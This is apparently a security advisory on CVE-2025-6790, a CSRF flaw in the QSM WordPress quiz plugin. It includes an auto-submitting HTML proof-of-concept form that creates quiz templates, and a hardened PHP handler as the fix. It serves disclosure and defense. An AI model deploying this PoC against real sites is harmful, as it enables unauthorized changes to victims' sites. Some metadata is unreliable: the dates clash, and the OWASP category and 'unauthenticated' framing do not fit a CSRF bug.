Quiz And Survey Master (QSM) is a powerful WordPress plugin used to design and deploy quizzes, surveys, and assessments, with over 50,000 active installations. Despite its extensive use for educational and marketing purposes, a critical vulnerability—CVE-2025-6790—has been identified that permits unauthenticated attackers to perform Cross-Site Request Forgery (CSRF) against its AJAX endpoint for quiz template creation. This flaw allows an attacker to inject arbitrary templates into the system, potentially enabling further administrative actions or content hijacking without requiring any valid credentials.
| Field | Value |
|---|---|
| CVE | CVE-2025-6790 |
| Plugin Version | QSM < 10.2.3 |
| Critical | High |
| All Time | 2 883 377 |
| Active installations | 50 000+ |
| Publicly Published | May 30, 2025 |
| Last Updated | May 30, 2025 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6790 https://wpscan.com/vulnerability/af337f9f-c955-49eb-9675-2f85da96fcfe/ |
Timeline

| Date | Event |
|---|---|
| June 27, 2025 | Plugin testing and vulnerability detection in the Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker has been completed |
| June 27, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 21, 2025 | Registered CVE-2025-6790 |
Discovery of the Vulnerability
During a security assessment focused on QSM’s AJAX actions, researchers discovered that the qsm_insert_quiz_template action is exposed via admin-ajax.php without any nonce checks or capability verification. This endpoint accepts POST requests to insert or update quiz templates, trusting any incoming parameters. Because there is no CSRF protection—no nonce, no user capability validation—an attacker can craft a malicious HTML page that auto-submits a form to this endpoint, creating new templates silently under the guise of legitimate plugin use.
Understanding CSRF Attacks
Cross-Site Request Forgery (CSRF) takes advantage of the trust a site places in a user’s browser. In WordPress, secure AJAX endpoints require nonces or capability checks to ensure the request originates from an authenticated session. Past high-profile CSRF exploits in plugins such as Ultimate Member and WooCommerce have shown that missing nonce validation can lead to unauthorized changes—from user role escalations to settings tampering. In the case of QSM, CSRF allows an unauthenticated attacker not only to create rogue quiz templates but potentially to chain this to further actions, such as sending malicious quiz links to admins or injecting content that triggers additional backdoors.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-6790, an attacker needs no session cookie of their own; the following page auto-submits a forged POST request to the endpoint:
PoC:

```html
<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="qsm_insert_quiz_template" />
      <input type="hidden" name="template_name" value="HACKED_PAYLOAD" />
      <input type="hidden" name="template_content" value="<h1>HACKED</h1>" />
      <input type="hidden" name="template_id" value="" />
      <input type="hidden" name="template_type" value="result" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Unauthorized template creation can be leveraged in several harmful ways: an attacker could craft a quiz template that, when previewed by an administrator, contains JavaScript payloads to perform Stored XSS, credential theft, or REST API misuse to create new admin users. In educational or corporate settings, malicious quizzes could deploy ransomware downloads or phishing forms, tricking users into divulging sensitive information. Over time, these unauthorized templates could persist across plugin updates, creating a durable foothold for attackers.
Recommendations for Improved Security
To mitigate this vulnerability, QSM developers must implement strict CSRF protections and capability checks on the qsm_insert_quiz_template endpoint using check_ajax_referer() and current_user_can(). All AJAX actions that perform data-altering operations should require a valid nonce and verify that the requesting user has the necessary permissions (e.g., manage_options). Additionally, site administrators should restrict access to plugin endpoints through WAF rules that block unauthenticated requests to admin-ajax.php for QSM actions. Regular plugin updates and security audits will further minimize the risk of similar exploits.
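The following is an added example, not QSM's own code, of how an admin-ajax handler for a template-insert action looks once the checks recommended above are in place: it is registered for logged-in users only, verifies a nonce with check_ajax_referer(), verifies the manage_options capability with current_user_can(), and whitelists the template_type parameter. The function name qsm_insert_quiz_template_hardened, the nonce action 'qsm_template_nonce', the script handle and the allowed template types are assumptions.

```php
<?php
// Added example (hypothetical names; not the plugin's actual implementation).

// Register only the wp_ajax_ hook. Deliberately NOT registering
// wp_ajax_nopriv_ means anonymous requests never reach this callback.
add_action( 'wp_ajax_qsm_insert_quiz_template', 'qsm_insert_quiz_template_hardened' );

function qsm_insert_quiz_template_hardened() {
    // 1. CSRF protection: the request must carry a nonce bound to this action.
    //    On a missing or invalid nonce check_ajax_referer() ends the request
    //    with HTTP 403, so a cross-site auto-submitted form stops here.
    check_ajax_referer( 'qsm_template_nonce', 'nonce' );

    // 2. Authorization: a valid nonce proves intent, not privilege, so the
    //    capability required for template management is checked as well.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Input handling: whitelist template_type and sanitize the other fields.
    $allowed_types = array( 'result', 'email' ); // assumed set of template types
    $type = isset( $_POST['template_type'] ) ? sanitize_key( $_POST['template_type'] ) : '';
    if ( ! in_array( $type, $allowed_types, true ) ) {
        wp_send_json_error( array( 'message' => 'Invalid template type' ), 400 );
    }
    $name    = sanitize_text_field( wp_unslash( $_POST['template_name'] ?? '' ) );
    $content = wp_kses_post( wp_unslash( $_POST['template_content'] ?? '' ) );
    $id      = absint( $_POST['template_id'] ?? 0 );

    // Persisting $name / $content / $id is plugin-specific and not shown here.
    wp_send_json_success( array( 'template_id' => $id, 'template_type' => $type, 'name' => $name ) );
}

// Hand the nonce to the plugin's admin script so legitimate requests can
// include it as the 'nonce' POST field that check_ajax_referer() expects.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'qsm-template-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'qsm-template-admin', 'qsmTemplate', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'qsm_template_nonce' ),
    ) );
} );
```

Because the nonce is generated per logged-in user and session and is never readable by a third-party origin, a page like the PoC above cannot supply it, so the forged POST is rejected before any template is written.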
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-6790, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.